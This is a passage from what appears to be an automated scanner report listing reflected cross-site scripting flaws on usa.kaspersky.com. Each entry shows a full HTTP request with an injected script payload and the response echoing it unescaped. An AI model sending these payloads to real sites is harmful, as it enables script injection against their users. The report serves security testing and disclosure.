<link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox2?995fa"><script>alert(1)</script>7517b2c51a6=1" />
...[SNIP]...

1.89. http://usa.kaspersky.com/node/12354/lightbox2 [pure-pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of the pure-pp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f70"><script>alert(1)</script>83f6663b944a6dc68 was submitted in the pure-pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /node/12354/lightbox2?pure-pp=13f70"><script>alert(1)</script>83f6663b944a6dc68&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:48:40 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140520"
Content-Type: text/html; charset=utf-8
Content-Length: 20230
Date: Sun, 04 Sep 2011 12:48:47 GMT
X-Varnish: 1163090940
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox2?pure-pp=13f70"><script>alert(1)</script>83f6663b944a6dc68&x=0&y=0" />
...[SNIP]...

1.90. http://usa.kaspersky.com/node/17007 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d2f"><script>alert(1)</script>c7577d70262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node26d2f"><script>alert(1)</script>c7577d70262/17007 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:57:46 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141066"
Content-Type: text/html; charset=utf-8
Content-Length: 30654
Date: Sun, 04 Sep 2011 12:58:19 GMT
X-Varnish: 1163107146
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node26d2f"><script>alert(1)</script>c7577d70262/17007" />
...[SNIP]...

1.91. http://usa.kaspersky.com/node/17007 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2acfe"-alert(1)-"72f5f76d863 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node2acfe"-alert(1)-"72f5f76d863/17007 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:58:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141132"
Content-Type: text/html; charset=utf-8
Content-Length: 30557
Date: Sun, 04 Sep 2011 12:59:03 GMT
X-Varnish: 1163109057
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node2acfe"-alert(1)-"72f5f76d863/17007";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.92. http://usa.kaspersky.com/node/17007 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef28f"-alert(1)-"9c47b60f00f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node/17007ef28f"-alert(1)-"9c47b60f00f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:00:59 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141259"
Content-Type: text/html; charset=utf-8
Content-Length: 30557
Date: Sun, 04 Sep 2011 13:01:11 GMT
X-Varnish: 1163112847
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/17007ef28f"-alert(1)-"9c47b60f00f";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.93. http://usa.kaspersky.com/node/17007 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58af2"><script>alert(1)</script>22e36934d59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/1700758af2"><script>alert(1)</script>22e36934d59 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:00:08 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141208"
Content-Type: text/html; charset=utf-8
Content-Length: 29889
Date: Sun, 04 Sep 2011 13:00:27 GMT
X-Varnish: 1163111673
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/1700758af2"><script>alert(1)</script>22e36934d59" />
...[SNIP]...

1.94. http://usa.kaspersky.com/node/17007 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ff"><script>alert(1)</script>359df1f9655 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/17007?6a3ff"><script>alert(1)</script>359df1f9655=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:53:25 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140805"
Content-Type: text/html; charset=utf-8
Content-Length: 36832
Date: Sun, 04 Sep 2011 12:53:34 GMT
X-Varnish: 1163099614
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/17007?6a3ff"><script>alert(1)</script>359df1f9655=1" />
...[SNIP]...

1.95. http://usa.kaspersky.com/node/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8802f"-alert(1)-"54076cce41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node8802f"-alert(1)-"54076cce41c/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145420"
Content-Type: text/html; charset=utf-8
Content-Length: 30572
Date: Sun, 04 Sep 2011 14:10:34 GMT
X-Varnish: 1163255162
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node8802f"-alert(1)-"54076cce41c/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.96. http://usa.kaspersky.com/node/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab898"><script>alert(1)</script>b8234a2510c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodeab898"><script>alert(1)</script>b8234a2510c/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145379"
Content-Type: text/html; charset=utf-8
Content-Length: 32139
Date: Sun, 04 Sep 2011 14:09:49 GMT
X-Varnish: 1163253944
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodeab898"><script>alert(1)</script>b8234a2510c/index.html" />
...[SNIP]...

1.97. http://usa.kaspersky.com/node/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936f7"-alert(1)-"cd3a31c3f38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node/index.html936f7"-alert(1)-"cd3a31c3f38 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:41 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145501"
Content-Type: text/html; charset=utf-8
Content-Length: 30587
Date: Sun, 04 Sep 2011 14:11:52 GMT
X-Varnish: 1163258141
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/index.html936f7"-alert(1)-"cd3a31c3f38";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.98. http://usa.kaspersky.com/node/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fcf"><script>alert(1)</script>ee3eca5136f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/index.htmle9fcf"><script>alert(1)</script>ee3eca5136f HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:15 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145475"
Content-Type: text/html; charset=utf-8
Content-Length: 29919
Date: Sun, 04 Sep 2011 14:11:23 GMT
X-Varnish: 1163257168
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/index.htmle9fcf"><script>alert(1)</script>ee3eca5136f" />
...[SNIP]...

1.99. http://usa.kaspersky.com/node/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74a6a"-alert(1)-"474c2192743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node/index.html?74a6a"-alert(1)-"474c2192743=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:36 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145256"
Content-Type: text/html; charset=utf-8
Content-Length: 30570
Date: Sun, 04 Sep 2011 14:07:42 GMT
X-Varnish: 1163248782
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/index.html?74a6a"-alert(1)-"474c2192743=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.100. http://usa.kaspersky.com/node/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebdb9"><script>alert(1)</script>512ff95029d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/index.html?ebdb9"><script>alert(1)</script>512ff95029d=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:06:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145204"
Content-Type: text/html; charset=utf-8
Content-Length: 30651
Date: Sun, 04 Sep 2011 14:06:56 GMT
X-Varnish: 1163247096
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/index.html?ebdb9"><script>alert(1)</script>512ff95029d=1" />
...[SNIP]...

1.101. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1927f"><script>alert(1)</script>4da6a2e3d63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services1927f"><script>alert(1)</script>4da6a2e3d63/home-computer-security/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:04 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145464"
Content-Type: text/html; charset=utf-8
Content-Length: 36607
Date: Sun, 04 Sep 2011 14:11:17 GMT
X-Varnish: 1163256819
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services1927f"><script>alert(1)</script>4da6a2e3d63/home-computer-security/index.html" />
...[SNIP]...

1.102. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e87a"-alert(1)-"63b94f304e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services4e87a"-alert(1)-"63b94f304e1/home-computer-security/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:50 +0000
